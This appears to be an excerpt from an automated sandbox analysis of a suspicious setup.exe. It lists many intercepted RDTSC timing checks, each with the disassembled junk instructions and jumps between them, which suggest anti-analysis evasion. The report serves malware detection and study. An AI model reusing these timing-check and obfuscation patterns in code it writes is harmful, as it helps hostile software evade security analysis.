                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5A7718 second address: 5A7734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F808D4B80BFh 0x0000000e pop ecx 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5A9A60 second address: 5A9A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5A9A68 second address: 5A9A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 536B65 second address: 536B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5ACCE0 second address: 5ACCFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5ACCFC second address: 5ACD1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F808D280526h 0x00000009 jmp 00007F808D280531h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5ACFD9 second address: 5ACFDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5ACFDD second address: 5ACFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D28052Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B2518 second address: 5B251E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B251E second address: 5B2548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F808D28052Ch 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007F808D280530h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B2548 second address: 5B2575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C4h 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e jbe 00007F808D4B80BCh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B2575 second address: 5B2579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B2579 second address: 5B2592 instructions: 0x00000000 rdtsc 0x00000002 js 00007F808D4B80B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F808D4B80B8h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B2592 second address: 5B2598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B2598 second address: 5B259C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B759D second address: 5B75A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B75A1 second address: 5B75A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B61CE second address: 5B61D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B67D7 second address: 5B6806 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80BAh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 jmp 00007F808D4B80C1h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B6984 second address: 5B6988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B6988 second address: 5B69A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F808D4B80B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F808D4B80BEh 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B69A2 second address: 5B69A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B69A8 second address: 5B69D3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F808D4B80B6h 0x00000008 jmp 00007F808D4B80C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 je 00007F808D4B80B6h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B6C82 second address: 5B6C88 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B6C88 second address: 5B6CB5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F808D4B80BBh 0x00000008 je 00007F808D4B80B6h 0x0000000e pop edx 0x0000000f jp 00007F808D4B80C2h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B6CB5 second address: 5B6CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D280534h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B6CCF second address: 5B6CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F808D4B80BFh 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B6E61 second address: 5B6E75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B6E75 second address: 5B6E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B6E79 second address: 5B6E7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B6E7D second address: 5B6EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F808D4B80C4h 0x00000011 jbe 00007F808D4B80BCh 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B6EA9 second address: 5B6EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B6EB1 second address: 5B6EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B72A4 second address: 5B72A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 530039 second address: 530089 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F808D4B80B6h 0x0000000b jmp 00007F808D4B80C2h 0x00000010 popad 0x00000011 jnl 00007F808D4B80C5h 0x00000017 pop edx 0x00000018 pop eax 0x00000019 js 00007F808D4B80F1h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F808D4B80C3h 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 530089 second address: 5300A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D280534h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5300A4 second address: 5300AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5BBD16 second address: 5BBD5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D28052Fh 0x00000009 popad 0x0000000a push esi 0x0000000b push edx 0x0000000c pop edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop esi 0x00000010 jmp 00007F808D280538h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F808D280533h 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5BBD5D second address: 5BBD61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5BC34C second address: 5BC352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5BC352 second address: 5BC365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80BFh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5BC365 second address: 5BC369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5BC369 second address: 5BC373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5BC373 second address: 5BC3AB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F808D280526h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jbe 00007F808D280526h 0x00000017 jmp 00007F808D280532h 0x0000001c popad 0x0000001d jns 00007F808D28052Eh 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5BC3AB second address: 5BC3B5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F808D4B80C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5BBA5D second address: 5BBA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F808D280526h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5BBA6C second address: 5BBA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5BBA70 second address: 5BBA8A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F808D280526h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F808D280526h 0x00000014 jg 00007F808D280526h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5BC992 second address: 5BC996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5BCAD8 second address: 5BCAE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D28052Bh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5BCAE7 second address: 5BCAFD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F808D4B80B6h 0x00000008 jnp 00007F808D4B80B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5BCAFD second address: 5BCB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5BCE03 second address: 5BCE13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jl 00007F808D4B80B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5C1490 second address: 5C1496 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5C1496 second address: 5C14BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F808D4B80C8h 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5C70AA second address: 5C70BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F808D28052Ch 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5C70BA second address: 5C70C4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F808D4B80C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5C70C4 second address: 5C70CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5C70CA second address: 5C70F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 jmp 00007F808D4B80C8h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5C5C7F second address: 5C5CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F808D280533h 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F808D280526h 0x00000019 jnp 00007F808D280526h 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5C5CAC second address: 5C5CB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5C5CB2 second address: 5C5CB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5C5CB8 second address: 5C5CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C1h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5C5CCD second address: 5C5CD7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F808D280526h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5C669C second address: 5C66AC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F808D4B80B6h 0x00000008 js 00007F808D4B80B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5C6AF6 second address: 5C6AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53863B second address: 53863F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53863F second address: 538643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 538643 second address: 53864B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53864B second address: 538650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 538650 second address: 538682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F808D4B80BDh 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F808D4B80C6h 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 538682 second address: 5386A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jns 00007F808D280526h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F808D280534h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5386A2 second address: 5386A7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CA281 second address: 5CA287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CA287 second address: 5CA29B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jo 00007F808D4B80B6h 0x0000000c ja 00007F808D4B80B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CD8B2 second address: 5CD8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CD8B7 second address: 5CD8D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F808D4B80B6h 0x0000000a jmp 00007F808D4B80C6h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57EA65 second address: 57EA6B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57EA6B second address: 563308 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F808D4B80BAh 0x00000011 call dword ptr [ebp+122DB56Eh] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57EF09 second address: 57EF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F02C second address: 57F057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C1h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F808D4B80C2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F057 second address: 57F062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F062 second address: 3CE8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 nop 0x00000007 jmp 00007F808D4B80C5h 0x0000000c push dword ptr [ebp+122D1401h] 0x00000012 mov dx, si 0x00000015 call dword ptr [ebp+122D1850h] 0x0000001b pushad 0x0000001c mov dword ptr [ebp+122D1BC4h], ecx 0x00000022 xor eax, eax 0x00000024 sub dword ptr [ebp+122D2790h], edx 0x0000002a mov edx, dword ptr [esp+28h] 0x0000002e add dword ptr [ebp+122D1BC4h], eax 0x00000034 pushad 0x00000035 mov edx, 607D7F57h 0x0000003a mov dword ptr [ebp+122D193Bh], edi 0x00000040 popad 0x00000041 mov dword ptr [ebp+122D2A3Fh], eax 0x00000047 jmp 00007F808D4B80BBh 0x0000004c mov esi, 0000003Ch 0x00000051 sub dword ptr [ebp+122D1C5Ch], eax 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b mov dword ptr [ebp+122D2790h], ecx 0x00000061 jno 00007F808D4B80B7h 0x00000067 lodsw 0x00000069 pushad 0x0000006a pushad 0x0000006b xor ebx, dword ptr [ebp+122D2AFFh] 0x00000071 add edx, 763E7B1Eh 0x00000077 popad 0x00000078 xor dword ptr [ebp+122D1C5Ch], ecx 0x0000007e popad 0x0000007f add eax, dword ptr [esp+24h] 0x00000083 jmp 00007F808D4B80BFh 0x00000088 or dword ptr [ebp+122D2790h], eax 0x0000008e mov ebx, dword ptr [esp+24h] 0x00000092 pushad 0x00000093 ja 00007F808D4B80BCh 0x00000099 popad 0x0000009a push eax 0x0000009b jo 00007F808D4B80C8h 0x000000a1 push eax 0x000000a2 push edx 0x000000a3 jng 00007F808D4B80B6h 0x000000a9 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F135 second address: 57F13B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F13B second address: 57F13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F13F second address: 57F166 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F808D280526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 22CB68FAh 0x00000013 mov edi, dword ptr [ebp+122D2893h] 0x00000019 call 00007F808D280529h 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F166 second address: 57F177 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F808D4B80B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F177 second address: 57F18C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jnl 00007F808D280526h 0x00000014 pop ecx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F18C second address: 57F191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F191 second address: 57F197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F31D second address: 57F322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
